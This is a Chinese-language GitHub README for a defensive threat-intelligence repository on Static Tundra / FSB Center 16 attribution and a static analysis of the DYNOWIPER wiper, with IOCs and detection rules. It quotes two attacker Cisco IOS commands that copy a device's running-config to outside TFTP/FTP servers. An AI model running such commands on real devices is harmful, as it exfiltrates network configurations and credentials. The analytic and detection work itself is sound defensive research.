yankywilson/dynowiper-analysis
GitHub: yankywilson/dynowiper-analysis
对 DYNOWIPER 恶意软件的静态逆向分析与 Static Tundra/FSB Center 16 基础设施归因缺口研究的独立防御性 CTI 仓库,附带可直接使用的检测内容和经过验证的 IOC 排除清单。
Stars: 0 | Forks: 0
# Static Tundra / FSB Center 16 — 归因缺口分析与 DYNOWIPER 拆解
**TLP:CLEAR** · 防御性研究 · 独立 CTI
## 核心发现
**Cisco Talos 在 2025-02-20 暴露了一个 Static Tundra 的 IP。该攻击者在此后又继续使用了 133 天。**
该 IP 被发布在一篇关于**中国**盐台风(Salt Typhoon)的报告中,并被明确标记为*“与盐台风无关的 Smart Install 滥用”*,攻击者**未知**。六个月后,Talos 将该集群命名为 **Static Tundra — 俄罗斯 FSB Center 16**。
那时,行业媒体已经去除了这一警告说明,并将俄罗斯 FSB 的基础设施归入了中国相关的标题下。**这种错误标记目前仍然是该指标在 Google 搜索中的首要结果,并且已经扩散到了 VirusTotal 集合中。**
```
2025-02-20 Talos publishes 185.141.24.28 (in a Salt Typhoon report, "not Salt Typhoon", actor unknown)
2025-02-21 Trade press: "Cisco further exposes Salt Typhoon..." <- caveat stripped
2025-07-03 185.141.24.28 finally goes dark <- 133 days later
2025-08-20 Talos names the cluster: Static Tundra / FSB Center 16 <- 181-day attribution lag
```
**评估:** 这种错误归因极有可能降低了(对方)暴露自身基础设施的运营成本。一个监控自身基础设施是否暴露的操作者通常会关注 Russian-APT 的相关报告。而他们的 IP 却被暴露在一篇 Chinese-APT 的博客中,顶着 Chinese-APT 的标题,出现在 Chinese-APT 的信息流里。
## 仓库内容
| 路径 | 内容 |
|---|---|
| [`ANALYSIS.md`](ANALYSIS.md) | **ICD-203 评估** — 核心判断、备选方案、缺口与展望 |
| [`TIMELINE.md`](TIMELINE.md) | 基于原始来源重建的 133 天存活期时间线 |
| [`iocs/iocs.csv`](iocs/iocs.csv) | 指标,标记为 `NOVEL` / `CORROBORATED` / `PUBLISHED` |
| [`iocs/excluded.csv`](iocs/excluded.csv) | **我们排除的指标及其原因。** 请重点阅读此文件。 |
| [`detection/dynowiper.yar`](detection/dynowiper.yar) | YARA — 基于代码锚点,而非字符串锚点 |
| [`detection/dynowiper.sigma.yml`](detection/dynowiper.sigma.yml) | Sigma — 基于行为 |
| [`detection/hunting.md`](detection/hunting.md) | MDE KQL、扫描引擎查询、网络逻辑 |
| [`reverse-engineering/DYNOWIPER.md`](reverse-engineering/DYNOWIPER.md) | 完整的静态拆解 |
## 全新发现
### 基础设施
| 发现 | 置信度 |
|---|---|
| **所有四个已发布的 Static Tundra IP 均来自 AS60117 (Host Sailor Ltd)** — 这是一个 Talos 和 FBI 从未提及的提供商 | 几乎确定 (BGP) |
| **`185.141.24.28` 在被公开暴露后又运行了 133 天** — 未作出任何轮换 IOC 的响应 | 几乎确定 (带日期的原始来源) |
| **2025年2月的博客 = 首次公开露面,比正式归因早了 181 天** — 这两份报告从未被相互引用 | 几乎确定 |
| **活跃的行业媒体错误标记** 将俄罗斯 FSB 基础设施置于中国 MSS 标题下;并已扩散至 VT 集合中 | 几乎确定 |
| **CERT Polska 的五个 2025 年 12 月的指标与 Static Tundra 的四个指标之间存在零基础设施重叠** — 5 个 IP、5 个 ASN、5 个国家,无一属于 AS60117 | 几乎确定 (算术验证) |
### DYNOWIPER
| 发现 | 置信度 |
|---|---|
| **`program files(x86)` 排除项无效** — 该字面常量长度为 18 个字符,而真实的 Windows 组件名为 19 个字符。精确匹配比较永远无法触发。**该 wiper 摧毁了它原本旨在保留的 32 位应用程序安装。** | 极有可能 |
| **破坏公式为 `min(blocks × 0.01, 4096) × 16` 字节** — 占小文件的 1%;对大文件则有固定的 64 KB 上限。先前的报告仅提到“最多 4,096 个偏移量”。 | 几乎确定 |
| **此样本不携带 PDB 路径。** RSDS 记录虽然存在,但文件名字段已被清零。先前的报告将一个 `C:\Users\vagrant\...` 路径归因于这个确切的 SHA-256;但该字符串并不在文件中。 | 几乎确定 (字节验证) |
| **Rich header `328e56bfcf087b6de7810da157921400`** 与 **imphash `9956161cdbf58d343072c3eb29d186f0`** — 此前未公开。是 Version B 目前可用的最佳锚点。 | 几乎确定 |
## 本仓库不包含的内容
**没有针对 Static Tundra 基础设施的全新原子 IOC。 这是一个发现,而不是缺口。**
Static Tundra 的窃取暂存服务器在设计上就是**纯 IP 裸连**。Talos 自己捕获的语法证明了这一点:
```
do show running-config | redirect tftp:///conf_bckp
copy running-config ftp://user:pass@/output.txt
```
没有域名。没有证书。没有 DNS。在 Censys、Shodan、FOFA、Netlas、Silent Push(6 年留存期)、Validin、VirusTotal、Hurricane Electric、RIPE 和 CT logs 中进行了 16 轮搜寻,产生了**零**个新指标 — 而且每一个浮出水面的候选对象最终都属于其他人。
**那个零结果就是该论点的证据。** 每一个浮出水面的候选对象 — 一个 IIJ TLS 诱饵、一个被误读为 beacon 的 Microsoft Edge 会话、僵尸 A 记录、一家俄罗斯自行车店、一个荷兰钓鱼集群、一个拥有 75,000 个 IP 的商业化 JARM — 在与两个问题核对后都会不攻自破:*什么时候*(日期是否符合活动窗口期)以及*谁的*(谁实际控制该工件)。这些排除项已被记录在 [`iocs/excluded.csv`](iocs/excluded.csv) 中。
## 方法论
- **被动 / 物理隔离。** 仅进行扫描引擎审查和静态分析。在任何阶段都未接触攻击者基础设施。
- 对每项判断使用 **ICD-203 评估性语言**,并附带理由和证伪指标。
- 在每次追踪之前**预先注册解释**,从而确保结果是被如实读取的,而不是被生搬硬套的。
- **将零结果记录为发现。** 先后提出并否决了六个假设,包括作者自己提出的两个。
- **通过哈希值验证样本,而非通过名称。**
- 仅使用原始来源。在可行的情况下,从二进制文件中重新推导供应商的声明。
## 归因立场
**Static Tundra = FSB Center 16** 是 Talos 给出的高置信度定论,得到了 FBI 的佐证,且锚定于 2022 年的 DoJ 起诉书。**本仓库对此不持异议。**
**2025 年 12 月的波兰行动存在争议,本仓库不对此进行决断。**
| 来源 | 结论 | 依据 |
|---|---|---|
| CERT Polska | Static Tundra (FSB) | 基础设施“重叠” |
| ESET | Sandworm 关联 (GRU) | wiper 在欧盟的使用、能源目标定向、BlackEnergy/GreyEnergy 历史记录 |
| Dragos | 可能是 Sandworm | — |
我们的贡献是一项算术核查:**CERT Polska 发布的五个指标与有史以来仅发布过的四个 Static Tundra IP 之间,没有共享任何 ASN、前缀或提供商。** 这并不能推翻他们的归因 — 他们可能掌握着非公开数据,并且两者的运营角色不同(VPN 来源 vs. 窃取投放点)。但这确实意味着,这种“重叠”的说法在任何公开层面都得不到支持。
**最高评级为 MODERATE。单一供应商的归因不能直接作为事实继承。**
## 来源
全部为原始来源,均在分析期间获取:
- Cisco Talos — *Weathering the storm: In the midst of a Typhoon* (2025-02-20)
- Cisco Talos — *Russian state-sponsored espionage group Static Tundra...* (2025-08-20)
- CISA/NSA/FBI + 12 partners — **AA26-194A** (2026-07-13)
- FBI IC3 PSA250820 (2025-08-20)
- Elastic Security Labs — *DYNOWIPER* (2026-02-06)
- CERT Polska — Energy Sector Incident Report, 29 December
- Hurricane Electric BGP、RIPE RDAP、Silent Push、VirusTotal、crt.sh、FOFA、Censys
## 负责任的使用
`excluded.csv` 中的指标被**发布是为了让其他分析师不再去追踪它们**。其中一些是第三方受害者或无关的租户。**请勿将该文件中的任何内容视为攻击者基础设施。**
托管提供商在 RIPE 记录中出现的注册人姓名属于有记录的业务联系人,**并非攻击者身份**,因此被刻意省略。
*置信度术语遵循 ICD-203。欢迎指正 — 请提交 issue。*
标签:APT追踪, DNS 反向解析, SCADA, YARA, 云资产可视化, 哈希传递, 威胁情报, 开发者工具, 归因分析, 逆向分析, 防御加固